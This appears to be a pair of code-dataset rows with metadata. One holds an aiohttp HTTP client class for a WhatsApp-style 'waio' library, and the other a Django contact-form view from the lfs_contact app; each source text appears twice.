@staticmethod def decode_json(data: Union[List, Dict[str, Any]]): data_dumps = ujson.dumps(data, ensure_ascii=False) decoded_data_str = unquote(data_dumps) data_data_json = ujson.loads(decoded_data_str) return data_data_json @staticmethod def prepare_url(base_url: str, url: str, **kwargs): url = f"{base_url}/{url.format(**kwargs)}" return url
import aiohttp import ujson from urllib.parse import unquote from typing import Optional, Union, Dict, Any, List, Tuple from aiohttp import ContentTypeError from waio.client.exceptions import FailedDecodeJson class HTTPClient: async def request( self, method: str, url: str, headers: Optional[Dict[str, Any]] = None, **kwargs, ) -> Tuple[Dict[str, Any], int]: if not headers: headers = {} async with aiohttp.ClientSession(headers=headers) as session: async with session.request(method=method, url=url, **kwargs) as resp: return await self.generate_json_from_response(resp) async def generate_json_from_response( self, resp: aiohttp.ClientResponse ) -> Tuple[Dict[str, Any], int]: content_type = resp.headers.get('Content-Type') try: if content_type == 'text/plain': resp_text = await resp.text() resp_json = ujson.loads(resp_text) return self.decode_json(resp_json), resp.status elif content_type == 'application/json': resp_json = await resp.json() return resp_json, resp.status except ContentTypeError as e: raise FailedDecodeJson(f"Check args, URL is invalid - {e}") @staticmethod def decode_json(data: Union[List, Dict[str, Any]]): data_dumps = ujson.dumps(data, ensure_ascii=False) decoded_data_str = unquote(data_dumps) data_data_json = ujson.loads(decoded_data_str) return data_data_json @staticmethod def prepare_url(base_url: str, url: str, **kwargs): url = f"{base_url}/{url.format(**kwargs)}" return url
none
1
2.474092
2
lfs_contact/views.py
diefenbach/lfs-contact
2
6618650
from django.http import HttpResponseRedirect from django.shortcuts import render from django.urls import reverse from django.utils.translation import ugettext as _ from lfs.catalog.models import Product import lfs.customer.utils from lfs_contact.forms import ContactForm from lfs_contact.utils import send_contact_mail def contact_form(request, contact_form=ContactForm, template_name="lfs/contact/contact_form.html"): """Displays the contact form of LFS. """ if request.method == 'POST': form = contact_form(data=request.POST) if form.is_valid(): send_contact_mail(request, form) return HttpResponseRedirect(reverse("lfs_contact_form_sent")) else: customer = lfs.customer.utils.get_customer(request) product_id = request.GET.get('product_id', None) subject = '' try: name = customer.address.firstname + " " + customer.address.lastname email = customer.address.email except AttributeError: name = "" email = "" if product_id: try: product = Product.objects.get(pk=product_id, active=True) except Product.DoesNotExist: pass else: sku = product.get_sku() if sku: sku = ' (%s)' % sku subject = _('Availability of \'%(product_name)s\'%(sku)s') % dict(product_name=product.get_name(), sku=sku) form = contact_form(initial={"name": name, "email": email, 'subject': subject}) return render(request, template_name, { "form": form, }) def contact_form_sent(request, template_name="lfs/contact/contact_form_sent.html"): """Displays the page after the the contact form has been sent. """ return render(request, template_name, {})
from django.http import HttpResponseRedirect from django.shortcuts import render from django.urls import reverse from django.utils.translation import ugettext as _ from lfs.catalog.models import Product import lfs.customer.utils from lfs_contact.forms import ContactForm from lfs_contact.utils import send_contact_mail def contact_form(request, contact_form=ContactForm, template_name="lfs/contact/contact_form.html"): """Displays the contact form of LFS. """ if request.method == 'POST': form = contact_form(data=request.POST) if form.is_valid(): send_contact_mail(request, form) return HttpResponseRedirect(reverse("lfs_contact_form_sent")) else: customer = lfs.customer.utils.get_customer(request) product_id = request.GET.get('product_id', None) subject = '' try: name = customer.address.firstname + " " + customer.address.lastname email = customer.address.email except AttributeError: name = "" email = "" if product_id: try: product = Product.objects.get(pk=product_id, active=True) except Product.DoesNotExist: pass else: sku = product.get_sku() if sku: sku = ' (%s)' % sku subject = _('Availability of \'%(product_name)s\'%(sku)s') % dict(product_name=product.get_name(), sku=sku) form = contact_form(initial={"name": name, "email": email, 'subject': subject}) return render(request, template_name, { "form": form, }) def contact_form_sent(request, template_name="lfs/contact/contact_form_sent.html"): """Displays the page after the the contact form has been sent. """ return render(request, template_name, {})
en
0.932835
Displays the contact form of LFS. Displays the page after the the contact form has been sent.
2.208923
2